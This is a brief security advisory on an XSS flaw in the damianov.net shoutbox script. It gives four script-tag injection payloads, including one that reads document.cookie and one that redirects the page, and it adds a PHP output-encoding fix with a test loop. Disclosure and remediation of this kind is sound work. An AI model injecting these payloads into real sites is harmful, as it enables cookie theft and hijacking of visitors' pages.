damianov.net Shoutbox XSS Vulnerability

Please view the original advisory here.

The free shoutbox script from damianov.net suffers from an XSS vulnerability.

Arbitrary HTML and JavaScript code can be injected when adding a new
shout, regardless of whether HTML is allowed in shoutsettings.php.

#1 Example: <SCRIPT src=some-script.js></SCRIPT>
#2 Example: <SCRIPT>alert("XSS")</SCRIPT>
#3 Example: <SCRIPT>alert(document.cookie)</SCRIPT>
#4 Example: <script>document.location.href="http://www.google.de"</script>

Solution: Simply edit the code and add filters.
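
One way to add such a filter, shown as an added example that is not the shoutbox's own code: encode every shout on output, and when HTML is allowed, re-enable only a short list of attribute-less tags. The function name render_shout(), the $allowHtml parameter (standing in for the HTML setting in shoutsettings.php) and the allowed tag list are assumptions.

```php
<?php
declare(strict_types=1);

// Added example. render_shout() and $allowHtml are hypothetical names; the
// shoutbox's own code is not shown in the advisory.
function render_shout(string $message, bool $allowHtml): string
{
    // Encode every HTML metacharacter first, whatever the HTML setting says.
    $safe = htmlspecialchars($message, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');

    if ($allowHtml) {
        // Re-enable only bare, attribute-less formatting tags (assumed list).
        // Tags carrying attributes, and every other tag, stay encoded.
        $safe = preg_replace('#&lt;(/?)(b|i|u)&gt;#i', '<$1$2>', $safe) ?? $safe;
    }
    return '<div class="shout">' . nl2br($safe, false) . '</div>';
}

// The four payloads from the advisory, plus one constructed formatting case.
$samples = [
    '<SCRIPT src=some-script.js></SCRIPT>',
    '<SCRIPT>alert("XSS")</SCRIPT>',
    '<SCRIPT>alert(document.cookie)</SCRIPT>',
    '<script>document.location.href="http://www.google.de"</script>',
    '<b style="color:red">hi</b> <i>ok</i>', // constructed sample
];

foreach ([false, true] as $allowHtml) {
    foreach ($samples as $sample) {
        $html = render_shout($sample, $allowHtml);
        // No script element and no tag with attributes may survive as markup.
        if (stripos($html, '<script') !== false || stripos($html, '<b style') !== false) {
            throw new RuntimeException("unsafe output for: $sample");
        }
        echo ($allowHtml ? 'html on : ' : 'html off: '), $html, PHP_EOL;
    }
}
```

Encoding happens at output time, so shouts that were stored before the fix are rendered inert as well.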